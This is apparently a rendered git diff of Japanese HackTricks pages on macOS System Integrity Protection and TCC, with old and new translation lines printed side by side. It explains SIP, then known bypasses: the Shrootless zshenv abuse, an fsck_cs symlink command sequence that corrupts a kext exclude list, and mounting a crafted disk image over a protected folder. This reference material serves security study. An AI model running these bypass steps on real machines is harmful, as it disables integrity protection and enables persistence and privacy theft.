drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
```
以下は、**`restricted`** フラグが `/usr/libexec` ディレクトリがSIPによって保護されていることを示しています。SIPで保護されたディレクトリでは、ファイルを作成、変更、または削除することはできません。
ここでは、**`restricted`** フラグは `/usr/libexec` ディレクトリが SIP によって保護されていることを示しています。SIP で保護されたディレクトリでは、ファイルを作成、変更、削除することはできません。
さらに、ファイルに **`com.apple.rootless`** 拡張 **属性** が含まれている場合、そのファイルも **SIPによって保護されます**。
さらに、ファイルに属性 **`com.apple.rootless`** 拡張 **属性** が含まれている場合、そのファイルも **SIP によって保護されます**。
**SIPは他のrootアクションも制限します** 例えば:
**SIP は他の root アクションも制限**します:
* 信頼されていないカーネル拡張のロード
* Appleに署名されたプロセスのタスクポートの取得
* NVRAM変数の変更
* 信頼されていないカーネル拡張機能の読み込み
* Apple が署名したプロセスのタスクポートの取得
* NVRAM 変数の変更
* カーネルデバッグの許可
オプションはnvram変数にビットフラグとして保持されますIntelでは `csr-active-config`、ARMでは起動したデバイスツリーから `lp-sip0` が読み取られます。フラグはXNUソースコードの `csr.sh` で見つけることができます:
オプションは nvram 変数にビットフラグとして保持されますIntel の場合は `csr-active-config`、ARM の場合はブートされたデバイスツリーから `lp-sip0` が読み取られます)。`csr.sh` で XNU ソースコード内のフラグを見つけることができます:
<figure><img src="../../../.gitbook/assets/image (720).png" alt=""><figcaption></figcaption></figure>
### SIPステータス
### SIP ステータス
SIPがシステムで有効かどうかは、以下のコマンドで確認できます
次のコマンドでシステムで SIP が有効になっているかどうかを確認できます:
```bash
csrutil status
```
```
csrutil disable
```
必要であれば、SIP を無効にするには、コンピュータをリカバリモードで再起動する必要があります(起動時に Command+R を押します)、その後、次のコマンドを実行します:
```bash
csrutil disable
```
```markdown
SIPを有効にしたままデバッグ保護を解除するには、次のようにします:
```
SIPを有効のままにしてデバッグ保護を削除したい場合は、次のようにします:
```bash
csrutil enable --without debug
```
### その他の制限
SIPは、**未署名のカーネル拡張**kextsの読み込みを禁止し、macOSシステムプロセスの**デバッグ**を防ぎます。また、dtraceなどのツールがシステムプロセスを検査することも妨げます。
- **署名されていないカーネル拡張機能**kextの読み込みを禁止し、検証済みの拡張機能のみがシステムカーネルとやり取りすることを保証します。
- macOSシステムプロセスの**デバッグを防止**し、コアシステムコンポーネントを不正なアクセスや変更から保護します。
- dtraceなどのツールがシステムプロセスを検査するのを**防止**し、システムの運用の整合性をさらに保護します。
[このトークでのSIPの詳細情報](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)。
**[このトークでSIP情報について詳しく学ぶ](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship).**
## SIPバイパス
## SIP バイパス
攻撃者がSIPをバイパスすると、以下のことが可能になります:
SIPをバイパスすることで、攻撃者は次のことができます:
* すべてのユーザーのメール、メッセージ、Safariの履歴などを読む
* ウェブカメラ、マイクなどの権限を付与するSIP保護されたTCCデータベースに直接書き込むことで - TCCバイパス
* 永続性マルウェアをSIP保護された場所に保存し、rootでさえ削除できない。また、MRTを改ざんすることもできる
* カーネル拡張を読み込む容易さ(それでもこのための他のハードコアな保護が存在します)
- **ユーザーデータへのアクセス**すべてのユーザーアカウントからメール、メッセージ、Safariの履歴などの機密ユーザーデータを読み取ることができます。
- **TCC バイパス**TCC透明性、同意、および制御データベースを直接操作して、ウェブカメラ、マイク、およびその他のリソースへの不正なアクセスを許可することができます。
- **持続性の確立**SIPで保護された場所にマルウェアを配置し、ルート権限でも削除できないようにします。これにはマルウェア除去ツールMRTを改ざんする可能性も含まれます
- **カーネル拡張機能の読み込み**追加の保護策があるものの、SIPをバイパスすると署名されていないカーネル拡張機能を読み込むプロセスが簡素化されます
### インストーラーパッケージ
**Appleの証明書で署名されたインストーラーパッケージ**は、その保護をバイパスできます。つまり、標準の開発者によって署名されたパッケージでも、SIP保護ディレクトリを変更しようとするとブロックされます。
**Appleの証明書で署名されたインストーラーパッケージ**は、その保護をバイパスできます。これは、標準開発者によって署名されたパッケージでも、SIP保護されたディレクトリを変更しようとするとブロックされることを意味します。
### 存在しないSIPファイル
潜在的な抜け穴の一つは、**`rootless.conf`に指定されているが現在存在しない**ファイルを作成できることです。マルウェアはこれを利用してシステム上に**永続性**を確立することができます。例えば、悪意のあるプログラムが`rootless.conf`にリストされているが存在しない場合、`/System/Library/LaunchDaemons`に.plistファイルを作成することができます。
1つの潜在的な抜け穴は、**`rootless.conf`で指定されたファイルが現在存在しない**場合、作成できることです。マルウェアはこれを利用してシステム上に**持続性を確立**する可能性があります。たとえば、`rootless.conf`にリストされているが存在しない場合、悪意のあるプログラムは`/System/Library/LaunchDaemons`に.plistファイルを作成することができます。
### com.apple.rootless.install.heritable
{% hint style="danger" %}
エンタイトルメント**`com.apple.rootless.install.heritable`**はSIPをバイパスすることを可能にします
権限 **`com.apple.rootless.install.heritable`** を使用するとSIPをバイパスできます
{% endhint %}
#### Shrootless
[**このブログ投稿の研究者たち**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)は、macOSのシステムインテグリティプロテクションSIPメカニズムにおける脆弱性を発見しました。この脆弱性は'Shrootless'と名付けられ、**`system_installd`**デーモンを中心にしています。このデーモンには、**`com.apple.rootless.install.heritable`**というエンタイトルメントがあり、その子プロセスがSIPのファイルシステム制限をバイパスすることを可能にします。
[**このブログ投稿からの研究者**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) は、macOSのシステムインテグリティ保護SIPメカニズムにおける 'Shrootless' 脆弱性を発見しました。この脆弱性は、**`system_installd`** デーモンを中心にしており、このデーモンには **`com.apple.rootless.install.heritable`** という権限があり、その子プロセスのいずれかがSIPのファイルシステム制限をバイパスできるようにします。
**`system_installd`**デーモンは、**Apple**によって署名されたパッケージをインストールします。
**`system_installd`** デーモンは、**Apple** によって署名されたパッケージ.pkgファイルをインストールします。
研究者たちは、Appleに署名されたパッケージ.pkgファイルのインストール中に、**`system_installd`**がパッケージに含まれる**ポストインストール**スクリプトを**実行**することを発見しました。これらのスクリプトはデフォルトのシェルである**`zsh`**によって実行され、**`zsh`**は非対話モードでも存在する場合は**`/etc/zshenv`**ファイルからコマンドを自動的に**実行**します。攻撃者はこの挙動を悪用することができます:悪意のある`/etc/zshenv`ファイルを作成し、**`system_installd`が`zsh`を起動するのを待つ**ことで、デバイス上で任意の操作を実行することができます。
研究者たちは、Appleによって署名されたパッケージ(.pkgファイルのインストール中に、**`system_installd`** がパッケージに含まれる **post-install** スクリプトを実行することを発見しました。これらのスクリプトはデフォルトのシェル **`zsh`** によって実行され、非対話モードでも存在する場合は **`/etc/zshenv`** ファイルからコマンドが自動的に実行されます。この動作は攻撃者によって悪用される可能性があります:悪意のある `/etc/zshenv` ファイルを作成し、**`system_installd` が `zsh` を起動するのを待つ**ことで、デバイス上で任意の操作を実行できます。
さらに、**`/etc/zshenv`はSIPバイパスだけでなく一般的な攻撃手法として使用できる**ことが発見されました。各ユーザープロファイルには`~/.zshenv`ファイルがあり、`/etc/zshenv`と同じように動作しますが、root権限は必要ありません。このファイルは、`zsh`が起動するたびにトリガーされる永続性メカニズムとして、または権限昇格メカニズムとして使用できます。管理ユーザーが`sudo -s`または`sudo <command>`を使用してrootに昇格する場合、`~/.zshenv`ファイルがトリガーされ、効果的にrootに昇格します。
さらに、**`/etc/zshenv` はSIPバイパスだけでなく一般的な攻撃手法として使用できる**ことが発見されました。各ユーザープロファイルには `~/.zshenv` ファイルがあり、これは `/etc/zshenv` と同じように動作しますが、ルート権限は必要ありません。このファイルは、`zsh` が起動するたびにトリガーされる持続性メカニズムとして使用することができ、また特権昇格メカニズムとしても使用できます。管理者ユーザーが `sudo -s` または `sudo <command>` を使用してルートに昇格すると、`~/.zshenv` ファイルがトリガーされ、実質的にルートに昇格します。
#### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)
[**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)では、**`system_installd`**プロセスが依然として悪用される可能性があることが発見されました。それは、**ポストインストールスクリプトをSIPによって保護されたランダムな名前のフォルダ内の`/tmp`に配置**していました。問題は、**`/tmp`自体はSIPによって保護されていない**ため、**仮想イメージをそれにマウント**することが可能であり、その後**インストーラー**がそこに**ポストインストールスクリプト**を配置し、仮想イメージを**アンマウント**し、すべての**フォルダ**を**再作成**し、**ポストインストール**スクリプトに**ペイロード**を**追加**して実行することができました。
[**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) では、同じ **`system_installd`** プロセスが **`/tmp` 内のSIPで保護されたランダムな名前のフォルダに post-install スクリプトを配置**していたため、悪用される可能性があることが発見されました。**`/tmp` そのものはSIPで保護されていない**ため、**仮想イメージをマウント**し、**インストーラー**がそこに **post-install スクリプトを配置**し、仮想イメージを **アンマウント**し、**すべてのフォルダを再作成**し、**ペイロードを実行する post-install スクリプト**を追加することが可能でした。
#### [fsck\_csユーティリティ](https://www.theregister.com/2016/03/30/apple\_os\_x\_rootless/)
#### [fsck\_cs ユーティリティ](https://www.theregister.com/2016/03/30/apple\_os\_x\_rootless/)
このバイパスは、**`fsck_cs`**が**シンボリックリンク**をたどり、それに提示されたファイルシステムを修正しようとする事実を利用していました
**`fsck_cs`** が **シンボリックリンク** をたどる能力により、重要なファイルを破損させるように誤誘導される脆弱性が特定されました。具体的には、攻撃者が _`/dev/diskX`_ からファイル `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist` へのリンクを作成しました。 _`/dev/diskX`_ 上で **`fsck_cs`** を実行すると、`Info.plist` が破損します。このファイルの整合性は、カーネル拡張機能の読み込みを制御するmacOSのSIPシステムインテグリティ保護にとって重要です。破損すると、SIPのカーネル除外の管理能力が損なわれます
したがって、攻撃者は_`/dev/diskX`_から`/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`へのシンボリックリンクを作成し、前者に対して**`fsck_cs`**を呼び出すことができます。`Info.plist`ファイルが破損すると、オペレーティングシステムは**カーネル拡張の除外を制御できなくなり**、その結果SIPをバイパスします。
{% code overflow="wrap" %}
この脆弱性を悪用するためのコマンドは次のとおりです:
```bash
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
```
{% endcode %}
この脆弱性の悪用には深刻な影響があります。通常、カーネル拡張機能のアクセス許可を管理する`Info.plist`ファイルが無効になります。これには、`AppleHWAccess.kext`など特定の拡張機能をブラックリストに登録できなくなることが含まれます。したがって、SIPの制御メカニズムが機能しなくなると、この拡張機能がロードされ、システムのRAMへの不正な読み取りおよび書き込みアクセスが許可されます。
前述のInfo.plistファイルは、**SIPによって一部のカーネル拡張をホワイトリストに登録し、特定の他の拡張をロードから** **ブロック**するために使用されます。通常、Apple自身のカーネル拡張**`AppleHWAccess.kext`**をブラックリストに登録しますが、設定ファイルが破壊されたことで、システムRAMに対して読み書きを自由に行うためにロードして使用することができます。
#### [SIP保護されたフォルダーの上にマウントする](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
#### [SIP保護フォルダ上にマウントする](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
**SIP保護フォルダ上に新しいファイルシステムをマウントして保護をバイパスする**ことが可能でした。
**SIP保護されたフォルダーに新しいファイルシステムをマウントして保護をバイパスする**ことが可能でした。
```bash
mkdir evil
# Add contento to the folder
hdiutil create -srcfolder evil evil.dmg
hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
```
#### [アップグレーダーのバイパス (2016)](https://objective-see.org/blog/blog\_0x14.html)
#### [アップグレードバイパス2016](https://objective-see.org/blog/blog\_0x14.html)
実行されると、アップグレード/インストーラーアプリケーション(例:`Install macOS Sierra.app`は、ダウンロードされたアプリケーション内に埋め込まれたインストーラーディスクイメージを使ってシステムがブートするように設定します。このインストーラーディスクイメージには、例えばOS X El CapitanからmacOS SierraへのOSをアップグレードするためのロジックが含まれています。
アップグレード/インストーラーイメージ(`InstallESD.dmg`)からシステムをブートするために、`Install macOS Sierra.app`は**`bless`**ユーティリティ(エンタイトルメント`com.apple.rootless.install.heritable`を継承)を利用します:
{% code overflow="wrap" %}
システムは、`Install macOS Sierra.app`内の埋め込みインストーラーディスクイメージから起動するように設定されており、`bless`ユーティリティを使用してOSをアップグレードします。使用されるコマンドは次のとおりです
```bash
/usr/sbin/bless -setBoot -folder /Volumes/Macintosh HD/macOS Install Data -bootefi /Volumes/Macintosh HD/macOS Install Data/boot.efi -options config="\macOS Install Data\com.apple.Boot" -label macOS Installer
```
{% endcode %}
プロセスのセキュリティは、攻撃者がブート前にアップグレードイメージ(`InstallESD.dmg`を変更すると危険にさらされる可能性があります。この戦略は、動的ローダーdyldを悪意のあるバージョン`libBaseIA.dylib`)で置き換えることを含みます。この置き換えにより、インストーラーが起動されるときに攻撃者のコードが実行されます。
したがって、攻撃者がシステムがそれから起動する前にアップグレードイメージ(`InstallESD.dmg`を変更できれば、SIPをバイパスできます。
攻撃者のコードは、アップグレードプロセス中に制御を取得し、システムがインストーラーを信頼していることを悪用します。攻撃は、`InstallESD.dmg`イメージをメソッドスイズリングを介して変更し、特に`extractBootBits`メソッドを標的とします。これにより、ディスクイメージが使用される前に悪意のあるコードを注入することが可能となります。
イメージを変更して感染させる方法は、アプリケーションのコンテキストで悪意のあるdylibを素朴にロードして実行する動的ローダーdyldを置き換えることでした。例えば、**`libBaseIA`** dylibのように。したがって、ユーザーがインストーラーアプリケーションを起動するたびに例えば、システムをアップグレードするために、私たちの悪意のあるdyliblibBaseIA.dylibと名付けられたもインストーラー内でロードされ、実行されます。
さらに、`InstallESD.dmg`内には、アップグレードコードのルートファイルシステムとして機能する`BaseSystem.dmg`があります。これに動的ライブラリを注入することで、悪意のあるコードがOSレベルのファイルを変更する能力を持つプロセス内で動作することが可能となり、システムの侵害の可能性が大幅に高まります。
今、インストーラーアプリケーションの'内部'で、私たちはこのアップグレードプロセスのフェーズを制御できます。インストーラーがイメージを'祝福'するので、使用される前にイメージ、**`InstallESD.dmg`**を乗っ取るだけです。これは、**`extractBootBits`**メソッドをメソッドスウィズリングでフックすることで可能でした。\
悪意のあるコードがディスクイメージが使用される直前に実行されるので、それを感染させる時が来ました。
`InstallESD.dmg`の中には、アップグレードコードの'ルートファイルシステム'である別の埋め込みディスクイメージ`BaseSystem.dmg`があります。`BaseSystem.dmg`に動的ライブラリを注入することで、OSレベルのファイルを変更できるプロセスのコンテキスト内で悪意のあるコードが実行されます。
#### [systemmigrationd (2023)](https://www.youtube.com/watch?v=zxZesAN-TEk)
[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk)でのこのトークでは、SIPをバイパスできる**`systemmigrationd`**が**bash**と**perl**スクリプトを実行し、環境変数**`BASH_ENV`**と**`PERL5OPT`**を介して悪用される可能性が示されています。
[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk)でのこのトークでは、**SIP**をバイパスできる**`systemmigrationd`**が**bash**と**perl**スクリプトを実行し、**`BASH_ENV`**と**`PERL5OPT`**経由で悪用されることが示されています。
### **com.apple.rootless.install**
{% hint style="danger" %}
エンタイトルメント**`com.apple.rootless.install`**はSIPをバイパスすることを許可します
権限 **`com.apple.rootless.install`** はSIPをバイパスできます
{% endhint %}
[**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/)から、システムXPCサービス`/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc`は、プロセスにSIP制限をバイパスする許可を与えるエンタイトルメント**`com.apple.rootless.install`**を持っています。また、**セキュリティチェックなしでファイルを移動するメソッドを公開しています。**
権限 `com.apple.rootless.install` は、macOSにおけるSystem Integrity ProtectionSIPをバイパスすることができることが知られています。これは特に、[**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/)に関連して言及されています。
この特定のケースでは、`/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc`にあるシステムXPCサービスがこの権限を持っています。これにより、関連するプロセスがSIPの制約を回避することが可能となります。さらに、このサービスにはセキュリティ対策を施さずにファイルを移動することを許可するメソッドが存在します。
## Sealed System Snapshots
Sealed System Snapshotsは、Appleが**macOS Big Sur (macOS 11)**で導入した機能で、**System Integrity Protection (SIP)**メカニズムの一部として追加のセキュリティとシステムの安定性を提供するためです。これらは、システムボリュームの読み取り専用バージョンです。
Sealed System Snapshotsは、**macOS Big SurmacOS 11**で導入されたAppleの機能で、**System Integrity ProtectionSIP**メカニズムの一部として追加のセキュリティとシステムの安定性を提供するものです。これらは基本的にシステムボリュームの読み取り専用バージョンです。
詳細については以下の通りです:
以下は、より詳細な説明です:
1. **不変のシステム**: Sealed System SnapshotsはmacOSシステムボリュームを「不変」とし、変更できないようにします。これにより、セキュリティやシステムの安定性を損なう可能性のある不正な変更や偶発的な変更を防ぎます。
2. **システムソフトウェアのアップデート**: macOSのアップデートやアップグレードをインストールすると、macOSは新しいシステムスナップショットを作成します。その後、macOSスタートアップボリュームは**APFS (Apple File System)**を使用してこの新しいスナップショットに切り替えます。アップデートの適用プロセス全体がより安全で信頼性が高くなり、アップデート中に何か問題が発生した場合、システムは常に前のスナップショットに戻ることができます。
3. **データの分離**: macOS Catalinaで導入されたデータとシステムボリュームの分離の概念と連動して、Sealed System Snapshot機能は、すべてのデータと設定が別の「**Data**」ボリュームに保存されることを確実にします。この分離により、データはシステムから独立し、システムアップデートのプロセスが簡素化され、システムのセキュリティが向上します。
1. **不変のシステム**Sealed System SnapshotsはmacOSシステムボリュームを「不変」にし、変更できないようにします。これにより、セキュリティやシステムの安定性が危険にさらされる可能性のある権限なしまたは誤った変更を防ぎます。
2. **システムソフトウェアの更新**macOSのアップデートやアップグレードをインストールすると、macOSは新しいシステムスナップショットを作成します。macOSの起動ボリュームは、**APFSApple File System**を使用してこの新しいスナップショットに切り替えます。更新を適用するプロセス全体が安全かつ信頼性が高くなり、更新中に何か問題が発生した場合は常に前のスナップショットに戻ることができます。
3. **データの分離**macOS Catalinaで導入されたデータとシステムボリュームの分離の概念と組み合わせて、Sealed System Snapshot機能は、すべてのデータと設定が別の「**Data**」ボリュームに保存されることを確認します。この分離により、データがシステムから独立しており、システムの更新プロセスが簡素化され、システムのセキュリティが向上します。
これらのスナップショットはmacOSによって自動的に管理され、APFSのスペース共有機能のおかげでディスク上に追加のスペースを取らないことを覚えておいてください。また、これらのスナップショットは、システム全体のバックアップである**Time Machineスナップショット**とは異なることに注意が必要です。
これらのスナップショットはmacOSによって自動的に管理され、APFSのスペース共有機能のおかげでディスク上の追加のスペースを取らずに済みます。また、これらのスナップショットは、システム全体のユーザーがアクセス可能なバックアップである**Time Machineスナップショット**とは異なります。
### スナップショットの確認
コマンド**`diskutil apfs list`**は、**APFSボリュームの詳細**とそのレイアウトをリストします:
コマンド **`diskutil apfs list`** は、**APFSボリュームの詳細**とそのレイアウトをリストします:
<pre><code>+-- Container disk3 966B902E-EDBA-4775-B743-CF97A0556A13
| ====================================================
@ -234,30 +223,30 @@ Sealed System Snapshotsは、Appleが**macOS Big Sur (macOS 11)**で導入した
| FileVault: Yes (Unlocked)
</code></pre>
前述の出力では、**ユーザーがアクセス可能な場所**が`/System/Volumes/Data`にマウントされていることがわかります。
前述の出力では、**ユーザーがアクセス可能な場所**が`/System/Volumes/Data`の下にマウントされていることがわかります。
さらに、**macOSシステムボリュームスナップショット**は`/`にマウントされ、**シールされています**OSによって暗号的に署名されています。したがって、SIPがバイパスされてそれを変更すると、**OSはもう起動しません**。
さらに、**macOSシステムボリュームスナップショット**は`/`にマウントされており、**封印されています**OSによって暗号化されています。したがって、SIPがバイパスされて変更された場合、**OSは起動しなくなります**。
シールが有効であることを**確認する**には、次のコマンドを実行します:
また、**シールが有効になっていることを確認**することも可能です。
```bash
csrutil authenticated-root status
Authenticated Root status: enabled
```
さらに、スナップショットディスクは**読み取り専用**としてマウントされています:
さらに、スナップショットディスクは**読み取り専用**としてマウントされます:
```
mount
/dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled)
```
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を使用して、ゼロからヒーローまでAWSハッキングを学ぶ</summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
- **会社をHackTricksで宣伝したい**場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローする 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)
- **ハッキングトリックを共有する**には、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください
</details>

222
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View file

@ -2,66 +2,64 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする。
* **ハッキングテクニックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する。
</details>
## **基本情報**
**TCC (透明性、同意、および制御)** は、macOSのメカニズムで、通常はプライバシーの観点から、特定の機能へのアプリケーションアクセスを**制限および制御する**ためのものです。これには、位置情報サービス、連絡先、写真、マイク、カメラ、アクセシビリティ、フルディスクアクセスなどが含まれます。
**TCCTransparency, Consent, and Control**は、アプリケーションの権限を規制するセキュリティプロトコルです。主な役割は、**位置情報サービス、連絡先、写真、マイクロフォン、カメラ、アクセシビリティ、およびフルディスクアクセス**などの機密機能を保護することです。これらの要素へのアプリのアクセスを許可する前に、明示的なユーザーの同意を求めることにより、TCCはプライバシーを強化し、ユーザーがデータを制御できるようにします。
ユーザーの視点からは、アプリケーションがTCCによって保護されている機能へのアクセスを求めるときに、**TCCが動作しているのを見ることができます**。このとき、**ユーザーにはダイアログが表示され**、アクセスを許可するかどうかを尋ねられます。
また、ユーザーがプログラムにファイルを**ドラッグ&ドロップする**など、ユーザーの**明示的な意図**によってアプリにファイルへのアクセスを**許可する**ことも可能です(もちろん、プログラムはそれにアクセスできるべきです)。
ユーザーは、アプリケーションが保護された機能へのアクセスをリクエストする際にTCCに遭遇します。これは、ユーザーが**アクセスを承認または拒否**できるプロンプトを介して可視化されます。さらに、TCCは、**ファイルをアプリケーションにドラッグアンドドロップする**などの直接的なユーザーアクションを受け入れ、特定のファイルへのアクセスを許可し、アプリケーションが明示的に許可されたものだけにアクセスできるようにします。
![TCCプロンプトの例](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
**TCC**は、`/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`にある**デーモン**によって処理され、`/System/Library/LaunchDaemons/com.apple.tccd.system.plist`で設定されていますmachサービス`com.apple.tccd.system`を登録)。
**TCC**は、`/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`にある**デーモン**によって処理され、`/System/Library/LaunchDaemons/com.apple.tccd.system.plist`で構成されています(`com.apple.tccd.system`マッチサービスを登録)。
ログインしている各ユーザーごとに実行される**ユーザーモードのtccd**は、`/System/Library/LaunchAgents/com.apple.tccd.plist`で定義されており、machサービス`com.apple.tccd`と`com.apple.usernotifications.delegate.com.apple.tccd`を登録しています。
ログインしているユーザーごとに定義された**ユーザーモードのtccd**が`/System/Library/LaunchAgents/com.apple.tccd.plist`に実行され、`com.apple.tccd`および`com.apple.usernotifications.delegate.com.apple.tccd`のマッチサービスを登録しています。
ここでは、システムとして、またユーザーとして実行されているtccdを見ることができます
ここでは、システムとユーザーとして実行されているtccdを見ることができます
```bash
ps -ef | grep tcc
0 374 1 0 Thu07PM ?? 2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079 1 0 6:59PM ?? 0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
```
権限は**親アプリケーションから継承され**、権限は**Bundle ID**と**Developer ID**に基づいて**追跡されます**
アプリケーションは**親から継承された権限**を持ち、**Bundle ID**と**開発者ID**に基づいて**権限が追跡**されます
### TCC データベース
許可/拒否はいくつかの TCC データベースに保存されます:
許可/拒否は次のTCCデータベースに保存されます:
* システム全体のデータベースは **`/Library/Application Support/com.apple.TCC/TCC.db`** にあります
* このデータベースは **SIP 保護されている**ため、SIP バイパスでのみ書き込むことができます。
* ユーザーごとの設定用のユーザー TCC データベース **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** 。
* このデータベースは保護されているため、フルディスクアクセスのような高い TCC 権限を持つプロセスのみが書き込むことができますただし、SIP によって保護されていません)。
- **`/Library/Application Support/com.apple.TCC/TCC.db`** にあるシステム全体のデータベース
- このデータベースは**SIP保護**されており、SIPバイパスのみが書き込めます。
- ユーザーTCCデータベース **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** はユーザーごとの設定に使用されます
- このデータベースは、**FDA**などの高いTCC権限を持つプロセスのみが書き込めますただし、SIPによる保護はされていません)。
{% hint style="warning" %}
前述のデータベースは読み取りアクセスに対しても **TCC で保護されています**。そのため、TCC 権限を持つプロセスからでない限り、通常のユーザー TCC データベースを**読むことはできません**
前述のデータベースは読み取りアクセスに対しても**TCC保護**されています。そのため、通常のユーザーTCCデータベースを読み取ることはできませんTCC権限を持つプロセスからでない限り
ただし、これらの高い権限を持つプロセス(**FDA** や **`kTCCServiceEndpointSecurityClient`** など)は、ユーザーの TCC データベースに書き込むことができることを覚えておいてください
ただし、**FDA**や**`kTCCServiceEndpointSecurityClient`**などの高い権限を持つプロセスは、ユーザーTCCデータベースに書き込むことができます
{% endhint %}
* **第三の** TCC データベースは **`/var/db/locationd/clients.plist`** にあり、**位置情報サービス**へのアクセスを許可されたクライアントを示します。
* SIP 保護されたファイル **`/Users/carlospolop/Downloads/REG.db`**TCC によって読み取りアクセスも保護されています)には、すべての**有効な TCC データベース**の**位置**が含まれています。
* SIP 保護されたファイル **`/Users/carlospolop/Downloads/MDMOverrides.plist`**TCC によって読み取りアクセスも保護されています)には、さらに多くの TCC 付与権限が含まれています。
